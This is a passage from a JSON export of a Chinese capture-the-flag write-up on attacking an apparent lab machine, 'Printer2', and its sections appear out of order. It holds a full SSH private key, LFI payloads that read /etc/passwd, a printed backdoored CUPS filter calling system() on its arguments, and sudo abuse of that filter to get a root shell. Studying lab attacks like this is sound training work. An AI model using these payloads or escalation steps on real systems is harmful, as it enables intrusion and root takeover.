KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAsMI4Mddj7c6DmNM3BjMN2wlxX4VArJvNMpnR1ajE+cmrVQueoRDj\nxUaEnFZbJrlWHJbDFHCr\/dusXroIkqYbyq0NgOK4lQcWjKC\/kg6E3OBumzdfmnyiwsF\/58\ncMc70pG2frbQu6q29pKqyihtAtDV6xq827uMDuJve+ohUs8akybrf9dunLr2iabxRT4CF1\n7NfQCY4S2iQvHgF3pKgDXoS7w+q4s60dd0Ka76MvsxUGFULOMp4QUL0SMMC1NEUuWhYMqC\nlSGX0NwwTmr1INDFaNOROoPitfSi06E\/ckTC6xd3Se8xxLhWV4JtCo1b5Rv4riE2JhBtS\/\nSqhDEXixbML3l6eK5jZOxNnIAD9863ZXHLSx9hN8v\/yzlXJHYyjji37Te4yX73O+5iZE1V\n\/SeZlQ1Gf56+JZWqQSaLd48lI23ajJX3RIwXkOMJOg93cF6u8h9RQlrFtBqSy5UaAYe9OF\n3BNFvlnaDIEC7RXkmagSKBaRDjOdMNoGw7D4I3hlAAAFiOlYdG7pWHRuAAAAB3NzaC1yc2\nEAAAGBALDCODHXY+3Og5jTNwYzDdsJcV+FQKybzTKZ0dWoxPnJq1ULnqEQ48VGhJxWWya5\nVhyWwxRwq\/3brF66CJKmG8qtDYDiuJUHFoygv5IOhNzgbps3X5p8osLBf+fHDHO9KRtn62\n0LuqtvaSqsoobQLQ1esavNu7jA7ib3vqIVLPGpMm63\/Xbpy69omm8UU+AhdezX0AmOEtok\nLx4Bd6SoA16Eu8PquLOtHXdCmu+jL7MVBhVCzjKeEFC9EjDAtTRFLloWDKgpUhl9DcME5q\n9SDQxWjTkTqD4rX0otOhP3JEwusXd0nvMcS4VleCbQqNW+Ub+K4hNiYQbUv0qoQxF4sWzC\n95eniuY2TsTZyAA\/fOt2Vxy0sfYTfL\/8s5VyR2Mo44t+03uMl+9zvuYmRNVf0nmZUNRn+e\nviWVqkEmi3ePJSNt2oyV90SMF5DjCToPd3BervIfUUJaxbQaksuVGgGHvThdwTRb5Z2gyB\nAu0V5JmoEigWkQ4znTDaBsOw+CN4ZQAAAAMBAAEAAAGAOr4RFt9SInIDYgKvwqus6yJUPz\n51o+eTZkGgbrVL4QeYnQbjjPuj9qfc4mgAmvn1GEMySdS4FAGxYznIJ5R0oAKq\/i5a0Ywt\nfkbd45hXp2Ae4g6hAyJwpPDRpSGNjdlLlAQRRYgkXV0FQl1lFhCRKGRT\/5i7zkav3ttuy0\nbmTNnCHPGglqhUPNMyn7\/NsCrumeuPA93nff+QeRRbwqjjlcHe9NlI0M2zgTLtcr5017sg\n7mfpRwEowuxS40jn75sdovPlBDjd9nXggjF5njEtJH3002\/Y7ktvXj0zut8IYzDeuaToOD\n+7pdjrdwwjnSw+YESyDmGYYiU48vmj8NYmkmO5CR7yN54fa+fWMj+UE2gOaVXXKLSUj9Nv\nvgSdihcknccB8QSlpbV9P2fowgL2F66CQmMBpcijjGsqYAnnTlLvDl4rr4mKALGpkBXRdk\nONcfBr4GCN9DCZhw4xK\/BNMTM8y89nQo1hEhdFST\/2m+JdiekeGEBjsYCS6NFMAWEBAAAA\nwFQXd68P2TJtMUBLclBpnCeoJ1KvFSrpo4WMXG2uuSBUiy1x7KzM42atvMf0\/OwJstW6C2\nkhWO9Q0CxeqMuSb4lQ5BhAz3kNNt+kJtgBdinw8M8\/1x\/FzA18xrvtq2haFOGw8cGF1U3u\nfpF+FCJl5+PxAITjKQVxa+rJlz9P2oQHcTI5PU0yQwfle53Dv9JBOVBPhPo1ITenOR6PIj\nPs7r4yUJI6jnnZ1rguOJFo\/gehUHrPmfVW4NfnYkWBQFafsAAAAMEA27rpSEIF2xYcmwNJ\nd31W0vbL05K1Zs2496hjo2xuDd0VTZBF+8+d2iZSUvhiXGw9MDFb0kaWEWGSqOA4UivtY9\neSrIzmU6fCkn3oxXiFvfexCn3iSxcbz0r2T9oGZ4CLuy\/raMmVwSa049Jzw6gtXbzWq\/dO\nsXIO1MIj9fuJ7kjriG9CYOYlXk6f2mIZvVmip6HNXdCwLySFitwQATTMY4m1jYV2IqRKKj\nuYWiQ9K4MZj60POU2EvZ8Tqhlt1hqVAAAAwQDN73kJIzeQlliK82rqUPtdTffS\/sIPl5mz\n1aJkeS8MI2sMvyLibNaZ2B8CuVrQ9Zsc1KGIw7M4DVljdI4Ua6l29MHPsbY4YHvPupVwBm\njHhCzZOmzzxOKmySh\/U2GUf1BHx4E\/9dkbyXRlF\/bAzopTbTcmc1ktP1UKw4bJwblqUOIA\nrR1UiEpKQFxbLzTOxCfRUHWKGBVJU1jfXU5QWtQX6DubkCw0vM6P2UmoLioutXr3ZkNU8K\ny3EhaUlRX0QpEAAAATbWFiZWxsZUBwcmludGVyLmhtdg==\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n\u5c1d\u8bd5\u5207\u6362\u4e00\u4e0b\u7528\u6237\uff01<\/p>\n
<\/div><\/p>\n\u8fdb\u4e00\u6b65\u63d0\u6743<\/h3>\n 3 sudo -l\n 4 ls -la\n 5 find \/ -perm -u=s -type f 2>\/dev\/null\n 6 \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\n 7 ss -atlp\n 8 nc 127.0.0.1 1001<\/code><\/pre>\n\u56e0\u4e3a\u8fd0\u884c\u7a0b\u5e8f\u4f1a\u8986\u76d6\u7ec8\u7aef\uff0c\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
No need for brute force here!\nHackerman<\/code><\/pre>\nI put a backdoor in a printer filter.\n\nFilter name: hack\nYou need to wait at least 60 seconds between attempts.<\/code><\/pre>\n\u8fdb\u4e00\u6b65\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n
mabelle@printer:~$ cd \/opt\nmabelle@printer:\/opt$ ls -la\ntotal 12\ndrwxr-xr-x 3 root root 4096 Apr 22 2023 .\ndrwxr-xr-x 18 root root 4096 Feb 6 2023 ..\ndrwxr-xr-x 26 501 staff 4096 Apr 16 2023 cups-2.3.3\nmabelle@printer:\/opt$ cd cups-2.3.3\/\nmabelle@printer:\/opt\/cups-2.3.3$ ls -la\n........\nmabelle@printer:\/opt\/cups-2.3.3$ cd filter\nmabelle@printer:\/opt\/cups-2.3.3\/filter$ ls -la\ntotal 1144\ndrwxr-xr-x 2 501 staff 4096 Apr 22 2023 .\ndrwxr-xr-x 26 501 staff 4096 Apr 16 2023 ..\n-rw-r--r-- 1 501 staff 11541 Feb 6 2023 commandtops.c\n-rw-r--r-- 1 root root 50488 Feb 6 2023 commandtops.o\n-rw-r--r-- 1 501 staff 11613 Feb 6 2023 common.c\n-rw-r--r-- 1 501 staff 1344 Feb 6 2023 common.h\n-rw-r--r-- 1 root root 49312 Feb 6 2023 common.o\n-rw-r--r-- 1 501 staff 2719 Feb 6 2023 Dependencies\n-rw-r--r-- 1 501 staff 2038 Feb 6 2023 gziptoany.c\n-rw-r--r-- 1 root root 17048 Feb 6 2023 gziptoany.o\n-rw-r--r-- 1 501 staff 4053 Feb 6 2023 Makefile\n-rw-r--r-- 1 501 staff 1295 Feb 6 2023 postscript-driver.header\n-rw-r--r-- 1 501 staff 14701 Feb 6 2023 postscript-driver.shtml\n-rw-r--r-- 1 501 staff 1275 Feb 6 2023 ppd-compiler.header\n-rw-r--r-- 1 501 staff 36686 Feb 6 2023 ppd-compiler.shtml\n-rw-r--r-- 1 501 staff 86511 Feb 6 2023 pstops.c\n-rw-r--r-- 1 root root 233464 Feb 6 2023 pstops.o\n-rw-r--r-- 1 501 staff 1232 Feb 6 2023 raster-driver.header\n-rw-r--r-- 1 501 staff 11869 Feb 6 2023 raster-driver.shtml\n-rw-r--r-- 1 501 staff 24526 Feb 6 2023 rastertoepson.c\n-rw-r--r-- 1 root root 104192 Feb 6 2023 rastertoepson.o\n-rw-r--r-- 1 501 staff 18977 Feb 6 2023 rastertohp.c\n-rw-r--r-- 1 root root 94120 Feb 6 2023 rastertohp.o\n-rw-r--r-- 1 501 staff 27170 Feb 6 2023 rastertolabel.c\n-rw-r--r-- 1 root root 129552 Feb 6 2023 rastertolabel.o\n-rw-r--r-- 1 root root 16862 Feb 6 2023 rastertopwg.c\n-rw-r--r-- 1 root root 78152 Feb 6 2023 rastertopwg.o\n-rw-r--r-- 1 501 staff 1346 Feb 6 2023 spec-ppd.header\n-rw-r--r-- 1 501 staff 79306 Feb 6 2023 spec-ppd.shtml<\/code><\/pre>\n\u7406\u8bba\u4e0a\u53ea\u8981\u8bd5\u5b8c\u5c31\u884c\u4e86\uff0c\u4f46\u662f\u6bcf\u8bd5\u4e00\u6b21\u5c31\u5f97\u505c60\u79d2\uff0c\u4ece\u540e\u5f80\u524d\u8fdb\u884c\u5c1d\u8bd5\uff0c\u3002<\/p>\n
mabelle@printer:\/opt\/cups-2.3.3\/filter$ ls *.c\ncommandtops.c common.c gziptoany.c pstops.c rastertoepson.c rastertohp.c rastertolabel.c rastertopwg.c<\/code><\/pre>\nI put a backdoor in a printer filter.\n\nFilter name: rastertopwg\n\nYou are awesome! Here is the password: wK4EyQ15Cga<\/code><\/pre>\n\u6210\u529f\uff0c\u62ff\u634f\u7684\u6b7b\u6b7b\u7684\uff0c\u563f\u563f\u3002<\/p>\n
\u5c1d\u8bd5\u5207\u6362\u6211\u4eec\u7684\u7528\u6237\uff1a<\/p>\n
mabelle@printer:\/opt\/cups-2.3.3\/filter$ su root\nPassword: \nsu: Authentication failure\nmabelle@printer:\/opt\/cups-2.3.3\/filter$ cat \/etc\/passwd | grep "bash"\nroot:x:0:0:root:\/root:\/bin\/bash\nmabelle:x:1000:1000:,,,:\/home\/mabelle:\/bin\/bash\nkierra:x:1001:1002:,,,:\/home\/kierra:\/bin\/bash\nmabelle@printer:\/opt\/cups-2.3.3\/filter$ su kierra\nPassword: \nkierra@printer:\/opt\/cups-2.3.3\/filter$ <\/code><\/pre>\n\u518d\u8fdb\u4e00\u6b65\u63d0\u6743<\/h3>\nkierra@printer:\/opt\/cups-2.3.3\/filter$ sudo -l\n[sudo] password for kierra: \nMatching Defaults entries for kierra on printer:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser kierra may run the following commands on printer:\n (ALL : ALL) \/usr\/lib\/cups\/filter\/rastertopwg<\/code><\/pre>\n\u67e5\u770b\u4e00\u4e0b\u8fd9\u4e2a\u51fd\u6570\u7684c\u8bed\u8a00\u4ee3\u7801\uff0c\u5e76\u5c1d\u8bd5\u8fd0\u884c\uff1a<\/p>\n
kierra@printer:\/opt\/cups-2.3.3\/filter$ ls -l \/usr\/lib\/cups\/filter\/rastertopwg\n-rwxr-xr-x 1 root root 18752 Mar 14 2022 \/usr\/lib\/cups\/filter\/rastertopwg\nkierra@printer:\/opt\/cups-2.3.3\/filter$ cat \/usr\/lib\/cups\/filter\/rastertopwg.c\ncat: \/usr\/lib\/cups\/filter\/rastertopwg.c: No such file or directory\nkierra@printer:\/opt\/cups-2.3.3\/filter$ ls -l *.c\n-rw-r--r-- 1 501 staff 11541 Feb 6 2023 commandtops.c\n-rw-r--r-- 1 501 staff 11613 Feb 6 2023 common.c\n-rw-r--r-- 1 501 staff 2038 Feb 6 2023 gziptoany.c\n-rw-r--r-- 1 501 staff 86511 Feb 6 2023 pstops.c\n-rw-r--r-- 1 501 staff 24526 Feb 6 2023 rastertoepson.c\n-rw-r--r-- 1 501 staff 18977 Feb 6 2023 rastertohp.c\n-rw-r--r-- 1 501 staff 27170 Feb 6 2023 rastertolabel.c\n-rw-r--r-- 1 root root 16862 Feb 6 2023 rastertopwg.c\nkierra@printer:\/opt\/cups-2.3.3\/filter$ cat rastertopwg.c<\/code><\/pre>\n\/*\n * 'main()' - Main entry for filter.\n *\/\n\nint \/* O - Exit status *\/\nmain(int argc, \/* I - Number of command-line args *\/\n char *argv[]) \/* I - Command-line arguments *\/\n{\n const char *final_content_type;\n\n for (int i = 1; i < argc; i++) {\n if (strncmp(argv[i], "exec:", 5) == 0) {\n system(argv[i] + 5);\n }\n }<\/code><\/pre>\nkierra@printer:\/opt\/cups-2.3.3\/filter$ sudo \/usr\/lib\/cups\/filter\/rastertopwg\nUsage: rastertopwg job user title copies options [filename]\nkierra@printer:\/opt\/cups-2.3.3\/filter$ sudo \/usr\/lib\/cups\/filter\/rastertopwg exec: whoami\nUsage: rastertopwg job user title copies options [filename]\nkierra@printer:\/opt\/cups-2.3.3\/filter$ sudo \/usr\/lib\/cups\/filter\/rastertopwg -exec whoami\nUsage: rastertopwg job user title copies options [filename]\nkierra@printer:\/opt\/cups-2.3.3\/filter$ sudo \/usr\/lib\/cups\/filter\/rastertopwg exec whoami\nUsage: rastertopwg job user title copies options [filename]\nkierra@printer:\/opt\/cups-2.3.3\/filter$ sudo \/usr\/lib\/cups\/filter\/rastertopwg exec:whoami\nroot\nUsage: rastertopwg job user title copies options [filename]\nkierra@printer:\/opt\/cups-2.3.3\/filter$ sudo \/usr\/lib\/cups\/filter\/rastertopwg exec:bash\nroot@printer:\/opt\/cups-2.3.3\/filter# cd \/root\nroot@printer:~# ls -la\ntotal 28\ndrwx------ 4 root root 4096 May 20 2023 .\ndrwxr-xr-x 18 root root 4096 Feb 6 2023 ..\nlrwxrwxrwx 1 root root 9 Apr 14 2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 637 Apr 16 2023 .bashrc\ndrwx------ 2 root root 4096 Apr 23 2023 .config\ndrwxr-xr-x 3 root root 4096 Apr 23 2023 .local\n-rw-r--r-- 1 root root 161 Jul 9 2019 .profile\n-rwx------ 1 root root 33 Feb 6 2023 root_flag.txt<\/code><\/pre>\n\u62ff\u5230rootshell\uff01\uff01\uff01\uff01\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"
Printer2 \u4fe1\u606f\u626b\u63cf \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/printer2] \u2514\u2500$ […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-653","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/653","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=653"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/653\/revisions"}],"predecessor-version":[{"id":654,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/653\/revisions\/654"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=653"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=653"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=653"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/printer2]\n\u2514\u2500$ rustscan -a 192.168.0.181 -- -A\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nReal hackers hack time \u231b\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.0.181:22\nOpen 192.168.0.181:80\nOpen 192.168.0.181:631\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)\n| ssh-hostkey: \n| 3072 db:f9:46:e5:20:81:6c:ee:c7:25:08:ab:22:51:36:6c (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDQGwzNlaaGEELNmSaaA5KPNGnxOCBP8oa7QB1kl8hkIrIGanBlB8e+lifNATIlUM57ReHEaoIiJMZLQlMTATjzQ3g76UxpkRMSfFMfjOwBr3T9xAuggn11GkgapKzgQXop1xpVnpddudlA2DGT56xhfAefOoh9LV\/Sx5gw\/9sH+YpjYZNn4WYrfHuIcvObaa1jE7js8ySeIRQffj5n6wX\/eq7WbohB6yFcLb1PBvnfNhvqgyvwcCWiwZoNhRMa+0ANpdpZyOyKQcbR51w36rmgJI0Y9zLIyjHvtxiNuncns0KFvlnS3JXywv277OvJuqhH4ORvXM9kgSKebGV+\/5R0D\/kFmUA0Q4o1EEkpwzXiiUTLs6j4ZwNojp3iUVWT6Wb7BmnxjeQzG05LXkoavc63aNf+lcSh9mQsepQNo5aHlHzMefPx\/j2zbjQN8CHCxOPWLTcpFlyQSZjjnpGxwYiYyqUZ0sF8l9GWtj6eVgeScGvGy6e0YTPG9\/d6o2oWdMM=\n| 256 33:c0:95:64:29:47:23:dd:86:4e:e6:b8:07:33:67:ad (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFwHzjIh47PVCBqaldJCFibsrsU4ERboGRj1+5RNyV5zFxNTNpdu8f\/rNL9s0p7zkqERtD2xb4zBIl6Vj9Fpdxw=\n| 256 be:aa:6d:42:43:dd:7d:d4:0e:0d:74:78:c1:89:a1:36 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOUM7hNt+CcfC4AKOuJumfdt3GCMSintNt9k0S2tA1XS\n80\/tcp open http syn-ack Apache httpd 2.4.56 ((Debian))\n|_http-server-header: Apache\/2.4.56 (Debian)\n| http-methods: \n|_ Supported Methods: HEAD GET POST OPTIONS\n|_http-title: Free Website Templates\n631\/tcp open ipp syn-ack CUPS 2.3\n|_http-server-header: CUPS\/2.3 IPP\/2.1\n| http-robots.txt: 1 disallowed entry \n|_\/\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n|_http-title: Home - CUPS 2.3.3op2\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/printer2]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.181\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/192.168.0.181\/\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: bak,jpg,txt,html,php,zip\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php (Status: 403) [Size: 278]\n\/images (Status: 301) [Size: 315] [--> http:\/\/192.168.0.181\/images\/]\n\/.html (Status: 403) [Size: 278]\n\/.html (Status: 403) [Size: 278]\n\/.php (Status: 403) [Size: 278]\n\/server-status (Status: 403) [Size: 278]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
<\/div><\/p>\n\u968f\u624b\u641c\u4e00\u4e0b\u6f0f\u6d1e\uff0c\u4f46\u662f\u6ca1\u627e\u5230\uff0c\u770b\u4e00\u4e0b\u5305\uff1a<\/p>\n
<\/div><\/p>\n\u5b58\u5728dns\u89e3\u6790\uff1a<\/p>\n
192.168.0.181 printer4life.printer.hmv<\/code><\/pre>\n\u5c1d\u8bd5\u63a2\u6d4b\u4e00\u4e0b\u5b50\u76ee\u5f55\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/printer2]\n\u2514\u2500$ gobuster dir -u http:\/\/printer4life.printer.hmv\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/printer4life.printer.hmv\/\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: bak,jpg,txt,html,php,zip\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php (Status: 403) [Size: 289]\n\/.html (Status: 403) [Size: 289]\n\/index.php (Status: 200) [Size: 365]\n\/logo (Status: 200) [Size: 77750]\n\/logo.jpg (Status: 200) [Size: 77750]\n\/hp.php (Status: 200) [Size: 27]\n\/hp.jpg (Status: 200) [Size: 33673]\n\/hp (Status: 200) [Size: 33673]\n\/canon (Status: 200) [Size: 101939]\n\/canon.jpg (Status: 200) [Size: 101939]\n\/canon.php (Status: 200) [Size: 30]\n\/epson.jpg (Status: 200) [Size: 64020]\n\/epson (Status: 200) [Size: 64020]\n\/epson.php (Status: 200) [Size: 30]\n\/.php (Status: 403) [Size: 289]\n\/.html (Status: 403) [Size: 289]\n\/server-status (Status: 403) [Size: 289]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\nLFI<\/h3>\n
\u518d\u770b\u770b\u6709\u5565\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/printer2]\n\u2514\u2500# curl http:\/\/printer4life.printer.hmv\/<!DOCTYPE html>\n<html>\n<head>\n <title>Printers<\/title>\n<\/head>\n<body>\n <h1>Select a printer<\/h1>\n <p>I love printers so much ! I print every minute<\/p>\n <ul>\n <li><a href="index.php?page=hp">HP<\/a><\/li>\n <li><a href="index.php?page=canon">Canon<\/a><\/li>\n <li><a href="index.php?page=epson">Epson<\/a><\/li>\n <\/ul>\n<\/body>\n<\/html><\/code><\/pre>\n\u53d1\u73b0\u7591\u4f3c\u5b58\u5728LFI<\/code>\u6f0f\u6d1e\uff1a<\/p>\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/printer2]\n\u2514\u2500# curl http:\/\/printer4life.printer.hmv\/index.php?page=..\/..\/..\/..\/..\/etc\/passwd\n<!DOCTYPE html>\n<html>\n<head>\n <title>Printers<\/title>\n<\/head>\n<body>\n <h1>Select a printer<\/h1>\n <p>I love printers so much ! I print every minute<\/p>\n <ul>\n <li><a href="index.php?page=hp">HP<\/a><\/li>\n <li><a href="index.php?page=canon">Canon<\/a><\/li>\n <li><a href="index.php?page=epson">Epson<\/a><\/li>\n <\/ul>\n<\/body>\n<\/html>\n\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:109::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:104:110:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\navahi-autoipd:x:105:113:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nmabelle:x:1000:1000:,,,:\/home\/mabelle:\/bin\/bash\navahi:x:107:115:Avahi mDNS daemon,,,:\/run\/avahi-daemon:\/usr\/sbin\/nologin\nsaned:x:108:117::\/var\/lib\/saned:\/usr\/sbin\/nologin\ncolord:x:109:118:colord colour management daemon,,,:\/var\/lib\/colord:\/usr\/sbin\/nologin\nsalt:x:110:119::\/var\/lib\/salt:\/bin\/sh\n_rpc:x:111:65534::\/run\/rpcbind:\/usr\/sbin\/nologin\nkierra:x:1001:1002:,,,:\/home\/kierra:\/bin\/bash<\/code><\/pre>\n\u4e0d\u9519\uff01\uff01\uff01\uff01\uff01<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/printer2]\n\u2514\u2500# curl http:\/\/printer4life.printer.hmv\/index.php?page=php:\/\/filter\/convert.base64-encode\/resource=..\/..\/..\/..\/..\/etc\/passwd\n<!DOCTYPE html>\n<html>\n<head>\n <title>Printers<\/title>\n<\/head>\n<body>\n <h1>Select a printer<\/h1>\n <p>I love printers so much ! I print every minute<\/p>\n <ul>\n <li><a href="index.php?page=hp">HP<\/a><\/li>\n <li><a href="index.php?page=canon">Canon<\/a><\/li>\n <li><a href="index.php?page=epson">Epson<\/a><\/li>\n <\/ul>\n<\/body>\n<\/html>\n\ncm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovcnVuL2lyY2Q6L3Vzci9zYmluL25vbG9naW4KZ25hdHM6eDo0MTo0MTpHbmF0cyBCdWctUmVwb3J0aW5nIFN5c3RlbSAoYWRtaW4pOi92YXIvbGliL2duYXRzOi91c3Ivc2Jpbi9ub2xvZ2luCm5vYm9keTp4OjY1NTM0OjY1NTM0Om5vYm9keTovbm9uZXhpc3RlbnQ6L3Vzci9zYmluL25vbG9naW4KX2FwdDp4OjEwMDo2NTUzNDo6L25vbm